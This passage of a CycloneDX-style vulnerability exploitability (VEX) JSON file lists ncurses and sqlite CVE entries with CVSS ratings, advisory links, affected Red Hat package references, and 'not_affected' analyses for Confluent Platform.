          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2020-19185",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in one_one_mapping function in progs/dump_entry.c:1373 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19185"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19185"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc1.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19185"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19185"
        }
      ],
      "published": "2023-08-22T19:15:57+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19186",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in _nc_find_entry function in tinfo/comp_hash.c:66 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19186"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19186"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc2.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19186"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19186"
        }
      ],
      "published": "2023-08-22T19:15:58+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19187",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1100 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19187"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19187"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc3.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19187"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19187"
        }
      ],
      "published": "2023-08-22T19:15:59+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
